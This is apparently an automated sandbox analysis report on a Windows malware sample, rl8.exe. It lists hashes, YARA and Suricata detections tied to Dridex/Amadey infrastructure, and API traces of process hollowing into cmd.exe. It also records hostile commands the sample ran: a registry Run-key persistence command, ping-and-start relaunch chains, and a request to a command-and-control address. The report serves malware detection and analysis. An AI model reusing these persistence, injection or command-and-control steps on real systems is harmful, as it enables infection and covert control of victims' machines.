Summary | ZeroBOX

rl8.exe

Category Machine Started Completed
FILE s1_win7_x6401 March 23, 2021, 10:48 a.m. March 23, 2021, 10:50 a.m.
Size 392.5KB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 5ab10b180aca215ff3af5ec0e0e00b87
SHA256 abe0c08037af3a6f1ee5f815c0c58d3c61aa8c4270ed432839872d0ea758b1bc
CRC32 85C11383
ssdeep 6144:tYeXsc8j7QUp4g/nWriB412fGzktXGBp3IFMunPd2TBdRTi+urG2WgC9fVw2EU4j:j6GBSMun12TxTibraHzs+j01Fa
Yara
  • PE_Header_Zero - PE File Signature Zero
  • OS_Processor_Check_Zero - OS Processor Check Signature Zero
  • win_files_operation - Affect private profile
  • IsPE64 - (no description)
  • IsWindowsGUI - (no description)
  • HasDebugData - DebugData Check
  • HasRichSignature - Rich Signature Check

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
35.166.81.240 Active Moloch
8.8.7.7 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49213 -> 35.166.81.240:443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 35.166.81.240:443 -> 192.168.56.101:49213 2023476 ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) A Network Trojan was detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49213
35.166.81.240:443
C=AT, ST=Bohn, L=Bohn, O=Amadey TM, OU=Amadey Org, CN=amadeamadey.at C=AT, ST=Bohn, L=Bohn, O=Amadey TM, OU=Amadey Org, CN=amadeamadey.at db:43:d0:55:5c:42:2f:4a:67:c8:eb:0d:da:a9:e7:13:22:8f:d9:28

Time & API Arguments Status Return Repeated

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features Connection to IP address suspicious_request GET https://35.166.81.240/waters/travel/new21
request GET https://35.166.81.240/waters/travel/new21
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1108
region_size: 147456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000180000000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 668
region_size: 147456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000180000000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1824
region_size: 147456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000180000000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2772
region_size: 147456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000180000000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077219000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077218000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\U4X2138.exe
cmdline cmd.exe
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2208
thread_handle: 0x00000000000000e4
process_identifier: 2680
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\rl8.exe M41OFD
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000e8
1 1 0

CreateProcessInternalW

thread_identifier: 1828
thread_handle: 0x00000000000000e0
process_identifier: 2288
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\U4X2138.exe MLUO54B
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000e4
1 1 0

CreateProcessInternalW

thread_identifier: 2084
thread_handle: 0x00000000000000e4
process_identifier: 2744
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\U4X2138.exe TQ8AX
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000e8
1 1 0
Paloalto generic.ml
Sophos ML/PE-A
AhnLab-V3 Malware/Win64.Generic.C4370271
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Create a windows service rule create_service
description Communications over UDP network rule network_udp_sock
description Listen for incoming communication rule network_tcp_listen
description Communications over P2P network rule network_p2p_win
description Communications over HTTP rule network_http
description File downloader/dropper rule network_dropper
description Communications over FTP rule network_ftp
description Communications over RAW socket rule network_tcp_socket
description Communications use DNS rule network_dns
description Communication using dga rule network_dga
description Escalade priviledges rule escalate_priv
description Take screenshot rule screenshot
description Run a keylogger rule keylogger
description Steal credential rule cred_local
description Record Audio rule sniff_audio
description APC queue tasks migration rule migrate_apc
description Malware can spread east-west using share drive rule spreading_share
description Create or check mutex rule win_mutex
description Affect system registries rule win_registry
description Affect system token rule win_token
description Affect private profile rule win_private_profile
description Affect private profile rule win_files_operation
description Match Winsock 2 API library declaration rule Str_Win32_Winsock2_Library
description Match Windows Inet API library declaration rule Str_Win32_Wininet_Library
description Match Windows Inet API call rule Str_Win32_Internet_API
description Match Windows Http API call rule Str_Win32_Http_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Create a windows service rule create_service
description Communications over UDP network rule network_udp_sock
description Listen for incoming communication rule network_tcp_listen
description Communications over P2P network rule network_p2p_win
description Communications over HTTP rule network_http
description File downloader/dropper rule network_dropper
description Communications over FTP rule network_ftp
description Communications over RAW socket rule network_tcp_socket
cmdline ping 8.8.7.7 -n 2
cmdline cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\U4X2138.exe MLUO54B
cmdline cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\U4X2138.exe TQ8AX
cmdline cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\rl8.exe M41OFD
host 35.166.81.240
host 8.8.7.7
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 139264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000004ac30000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000368
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\CRN6I0NGBZ reg_value cmd.exe /c reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v W2Y5JPZ00 /t REG_SZ /d "C:\Users\test22\AppData\Local\Temp\U4X2138.exe TQ8AX" & start "H" C:\Users\test22\AppData\Local\Temp\U4X2138.exe TQ8AX
file C:\Users\test22\AppData\Local\Temp\U4X2138.exe
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@غ´ Í!¸LÍ!This program cannot be run in DOS mode. $“Ôâÿ×µŒ¬×µŒ¬×µŒ¬õՊ­ÖµŒ¬õՍ­ÒµŒ¬×µ¬ÅµŒ¬×µŒ¬ÄµŒ¬@뎭ֵŒ¬Rich×µŒ¬PEd†:IX`ð" Î$È!ÃJ `ƒ d°à.textÍÎ `.rdataàÒ@@.dataÂðÚ@À.pdatadÜ@@
base_address: 0x000000004ac30000
process_identifier: 2312
process_handle: 0x0000000000000368
1 1 0

WriteProcessMemory

buffer: ErrCodeid%d&=ABCDEFGHIJKLMNOPQRTSUVWXYZ0123456789‡¦ÜsψMªK.$¥à¤Â$WN/ó_ÙåӐLòøE:ЉªK.$:IX`  b0p`àR 1 0 P p `ÀÐàð E 0 P p `ÀÐàð  b0Pp`àð b 0 P p `ÀÐàð  ’0Pp`à W 0 P p `ÀÐàðR0p`  ¢0Pp`àð  0 P p `ÀÐàð  "0Pp`àð  0Pp`à ’ 0 P p `ÀÐàðÒ0p` = 0 P p `ÀÐàð  0 P p `ÀÐàð ‚ 0 P p `ÀÐàð  0 P p `ÀÐàð ' 0 P p `ÀÐàð + 0 P p `ÀÐàð0p`R`p`  0 P p `ÀÐàðbp` ¢ 0 P p `ÀÐàðB  0 P p `ÀÐàð  0 P p `ÀÐàð h+ 0 P p `ÀÐàð"` 5 0 P p `ÀÐàð R 0 P p `ÀÐàð’ 0 Pp`Ààð h  0 P p `ÀÐàð  B0p`àb0Pp`  0 P p `ÀÐàð h; 0 P p `ÀÐàð  0 P p `ÀÐàðÂp`"  0Pp`àð0Pp``  "0Pp`à"0p`20p`R 0 Pp`Ààð  R0Pp`à’0p`Bp`2`  00Pp`à  0 P p `ÀÐàð h7 0 P p `ÀÐàð h# 0 P p `ÀÐàð  r0Pp`à  p` % 0 P p `ÀÐàð  p`  p`  ¢0p`à  B 0p`Ààð O 0 P p `ÀÐàð 2 0 P p `ÀÐàð‚0Pp`r`  ‚0p`à â 0 P p `ÀÐàð ñ 0 P p `ÀÐàð
base_address: 0x000000004ac4e000
process_identifier: 2312
process_handle: 0x0000000000000368
1 1 0

WriteProcessMemory

buffer: 
base_address: 0x000000004ac4f000
process_identifier: 2312
process_handle: 0x0000000000000368
1 1 0

WriteProcessMemory

buffer: ÈôâÈUÌàUýÜàýÅ!äàÐ!B*üàB*Œ*háŒ*è+áè+f-¼âf-î-°âî-0Ìä02(á2s6Ìäs67@á7‰;0â‰;†_Páˆ_eâedehádeÔhäåÔhêjtáêjyˆáy9{(á9{~ á~¨À㨁Áƒ´áÁƒBˆÄáBˆ¶‰â¶‰‹Üᝋ÷ èá÷ C¨âC¨/«Ìä/«…¬â…¬Š²0⊲ÉHâÉ_͘â_ÍåÓ`âåÓÕxâՐՄâÕ֌â֟֌âŸÖ…Øpã…؟ܘâŸÜÝhäÝ+Þ°â,Þëà¼âëàøàÔâøàÜêÜâÜê.ìôâ.ì#óüâ#ó|ö¼â|ö\ÿã\ÿ"0ã"Ôâ :8ã<Pã½Xã½ ãµpãµä!„ãä!3" ã3"=(0â@(Q,0âQ,n.Ìäp./há/÷/°ã÷/F4ÀãF4>6Ìä>6÷GØã÷GêHôãìHjI„âjIæIPãæI®J äñJL\äLêLäêL‰N ä‰N˜QÌä˜Q®S4ä°SbTDäbTbULäbU.W\ä.W´Whä´W¼Xtä¼X¶Yˆä¶YHZ˜äHZ²Z¤ä²ZëZ°äëZÊ\(áÌ\Êb¸äÊbbf„ãbfèhÌäèh®rää®rxåxòxáòx¯y°ã¯yšzåšz~˜â~¢,å¢҄8å҄‡På‡̈\å̈Œ‰h匉ŠxåŠ#­Œå#­‹¯Ì䌯À±¤åÀ±²Ôâ²–³¼å–³¶`ⶫ¸¼â«¸É»äåÉ»§Á0â§Á/Ã(á/ÃÌÉÌåÌÉ6ËÔå6Ë„Ïäå„ÏÝüå
base_address: 0x000000004ac51000
process_identifier: 2312
process_handle: 0x0000000000000368
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@غ´ Í!¸LÍ!This program cannot be run in DOS mode. $“Ôâÿ×µŒ¬×µŒ¬×µŒ¬õՊ­ÖµŒ¬õՍ­ÒµŒ¬×µ¬ÅµŒ¬×µŒ¬ÄµŒ¬@뎭ֵŒ¬Rich×µŒ¬PEd†:IX`ð" Î$È!ÃJ `ƒ d°à.textÍÎ `.rdataàÒ@@.dataÂðÚ@À.pdatadÜ@@
base_address: 0x000000004ac30000
process_identifier: 2312
process_handle: 0x0000000000000368
1 1 0
Process injection Process 2772 called NtSetContextThread to modify thread in remote process 2312
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.r14: 0
registers.r15: 0
registers.rcx: 1254302152
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 2555096
registers.r11: 0
registers.r8: 0
registers.r9: 0
registers.rip: 1998505216
registers.rdx: 8796092846080
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0
thread_handle: 0x00000000000000f4
process_identifier: 2312
1 0 0
Process injection Process 2680 resumed a thread in remote process 668
Process injection Process 2288 resumed a thread in remote process 1824
Process injection Process 2744 resumed a thread in remote process 2772
Process injection Process 2772 resumed a thread in remote process 2312
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 668
1 0 0

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 1824
1 0 0

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 2772
1 0 0

NtResumeThread

thread_handle: 0x00000000000000f4
suspend_count: 1
process_identifier: 2312
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2208
thread_handle: 0x00000000000000e4
process_identifier: 2680
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\rl8.exe M41OFD
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000e8
1 1 0

CreateProcessInternalW

thread_identifier: 2252
thread_handle: 0x0000000000000060
process_identifier: 2800
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 8.8.7.7 -n 2
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000064
1 1 0

CreateProcessInternalW

thread_identifier: 2932
thread_handle: 0x0000000000000064
process_identifier: 668
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\rl8.exe
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\rl8.exe M41OFD
filepath_r: C:\Users\test22\AppData\Local\Temp\rl8.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000060
1 1 0

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 668
1 0 0

NtResumeThread

thread_handle: 0x00000000000000bc
suspend_count: 1
process_identifier: 2800
1 0 0

CreateProcessInternalW

thread_identifier: 1828
thread_handle: 0x00000000000000e0
process_identifier: 2288
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\U4X2138.exe MLUO54B
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000e4
1 1 0

CreateProcessInternalW

thread_identifier: 2740
thread_handle: 0x0000000000000060
process_identifier: 2832
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 8.8.7.7 -n 2
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000064
1 1 0

CreateProcessInternalW

thread_identifier: 2076
thread_handle: 0x0000000000000064
process_identifier: 1824
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\U4X2138.exe
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\U4X2138.exe MLUO54B
filepath_r: C:\Users\test22\AppData\Local\Temp\U4X2138.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000060
1 1 0

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 1824
1 0 0

NtResumeThread

thread_handle: 0x00000000000000bc
suspend_count: 1
process_identifier: 2832
1 0 0

CreateProcessInternalW

thread_identifier: 2084
thread_handle: 0x00000000000000e4
process_identifier: 2744
current_directory:
filepath:
track: 1
command_line: cmd /c ping 8.8.7.7 -n 2 & start C:\Users\test22\AppData\Local\Temp\U4X2138.exe TQ8AX
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000000000e8
1 1 0

CreateProcessInternalW

thread_identifier: 1180
thread_handle: 0x0000000000000060
process_identifier: 1596
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 8.8.7.7 -n 2
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000064
1 1 0

CreateProcessInternalW

thread_identifier: 2240
thread_handle: 0x0000000000000064
process_identifier: 2772
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\U4X2138.exe
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\U4X2138.exe TQ8AX
filepath_r: C:\Users\test22\AppData\Local\Temp\U4X2138.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000060
1 1 0

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 2772
1 0 0

NtResumeThread

thread_handle: 0x00000000000000bc
suspend_count: 1
process_identifier: 1596
1 0 0

CreateProcessInternalW

thread_identifier: 1920
thread_handle: 0x00000000000000f4
process_identifier: 2312
current_directory:
filepath:
track: 1
command_line: cmd.exe
filepath_r:
stack_pivoted: 0
creation_flags: 20 (CREATE_NEW_CONSOLE|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000000000000368
1 1 0

NtGetContextThread

thread_handle: 0x00000000000000f4
1 0 0

NtUnmapViewOfSection

base_address: 0x000000004ac30000
region_size: 4096
process_identifier: 2312
process_handle: 0x0000000000000368
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 139264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000004ac30000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000368
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@غ´ Í!¸LÍ!This program cannot be run in DOS mode. $“Ôâÿ×µŒ¬×µŒ¬×µŒ¬õՊ­ÖµŒ¬õՍ­ÒµŒ¬×µ¬ÅµŒ¬×µŒ¬ÄµŒ¬@뎭ֵŒ¬Rich×µŒ¬PEd†:IX`ð" Î$È!ÃJ `ƒ d°à.textÍÎ `.rdataàÒ@@.dataÂðÚ@À.pdatadÜ@@
base_address: 0x000000004ac30000
process_identifier: 2312
process_handle: 0x0000000000000368
1 1 0

WriteProcessMemory

buffer:
base_address: 0x000000004ac31000
process_identifier: 2312
process_handle: 0x0000000000000368
1 1 0

WriteProcessMemory

buffer: ErrCodeid%d&=ABCDEFGHIJKLMNOPQRTSUVWXYZ0123456789‡¦ÜsψMªK.$¥à¤Â$WN/ó_ÙåӐLòøE:ЉªK.$:IX`  b0p`àR 1 0 P p `ÀÐàð E 0 P p `ÀÐàð  b0Pp`àð b 0 P p `ÀÐàð  ’0Pp`à W 0 P p `ÀÐàðR0p`  ¢0Pp`àð  0 P p `ÀÐàð  "0Pp`àð  0Pp`à ’ 0 P p `ÀÐàðÒ0p` = 0 P p `ÀÐàð  0 P p `ÀÐàð ‚ 0 P p `ÀÐàð  0 P p `ÀÐàð ' 0 P p `ÀÐàð + 0 P p `ÀÐàð0p`R`p`  0 P p `ÀÐàðbp` ¢ 0 P p `ÀÐàðB  0 P p `ÀÐàð  0 P p `ÀÐàð h+ 0 P p `ÀÐàð"` 5 0 P p `ÀÐàð R 0 P p `ÀÐàð’ 0 Pp`Ààð h  0 P p `ÀÐàð  B0p`àb0Pp`  0 P p `ÀÐàð h; 0 P p `ÀÐàð  0 P p `ÀÐàðÂp`"  0Pp`àð0Pp``  "0Pp`à"0p`20p`R 0 Pp`Ààð  R0Pp`à’0p`Bp`2`  00Pp`à  0 P p `ÀÐàð h7 0 P p `ÀÐàð h# 0 P p `ÀÐàð  r0Pp`à  p` % 0 P p `ÀÐàð  p`  p`  ¢0p`à  B 0p`Ààð O 0 P p `ÀÐàð 2 0 P p `ÀÐàð‚0Pp`r`  ‚0p`à â 0 P p `ÀÐàð ñ 0 P p `ÀÐàð
base_address: 0x000000004ac4e000
process_identifier: 2312
process_handle: 0x0000000000000368
1 1 0

WriteProcessMemory

buffer: 
base_address: 0x000000004ac4f000
process_identifier: 2312
process_handle: 0x0000000000000368
1 1 0

WriteProcessMemory

buffer: ÈôâÈUÌàUýÜàýÅ!äàÐ!B*üàB*Œ*háŒ*è+áè+f-¼âf-î-°âî-0Ìä02(á2s6Ìäs67@á7‰;0â‰;†_Páˆ_eâedehádeÔhäåÔhêjtáêjyˆáy9{(á9{~ á~¨À㨁Áƒ´áÁƒBˆÄáBˆ¶‰â¶‰‹Üᝋ÷ èá÷ C¨âC¨/«Ìä/«…¬â…¬Š²0⊲ÉHâÉ_͘â_ÍåÓ`âåÓÕxâՐՄâÕ֌â֟֌âŸÖ…Øpã…؟ܘâŸÜÝhäÝ+Þ°â,Þëà¼âëàøàÔâøàÜêÜâÜê.ìôâ.ì#óüâ#ó|ö¼â|ö\ÿã\ÿ"0ã"Ôâ :8ã<Pã½Xã½ ãµpãµä!„ãä!3" ã3"=(0â@(Q,0âQ,n.Ìäp./há/÷/°ã÷/F4ÀãF4>6Ìä>6÷GØã÷GêHôãìHjI„âjIæIPãæI®J äñJL\äLêLäêL‰N ä‰N˜QÌä˜Q®S4ä°SbTDäbTbULäbU.W\ä.W´Whä´W¼Xtä¼X¶Yˆä¶YHZ˜äHZ²Z¤ä²ZëZ°äëZÊ\(áÌ\Êb¸äÊbbf„ãbfèhÌäèh®rää®rxåxòxáòx¯y°ã¯yšzåšz~˜â~¢,å¢҄8å҄‡På‡̈\å̈Œ‰h匉ŠxåŠ#­Œå#­‹¯Ì䌯À±¤åÀ±²Ôâ²–³¼å–³¶`ⶫ¸¼â«¸É»äåÉ»§Á0â§Á/Ã(á/ÃÌÉÌåÌÉ6ËÔå6Ë„Ïäå„ÏÝüå
base_address: 0x000000004ac51000
process_identifier: 2312
process_handle: 0x0000000000000368
1 1 0

NtSetContextThread

registers.r14: 0
registers.r15: 0
registers.rcx: 1254302152
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 2555096
registers.r11: 0
registers.r8: 0
registers.r9: 0
registers.rip: 1998505216
registers.rdx: 8796092846080
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0
thread_handle: 0x00000000000000f4
process_identifier: 2312
1 0 0

NtResumeThread

thread_handle: 0x00000000000000f4
suspend_count: 1
process_identifier: 2312
1 0 0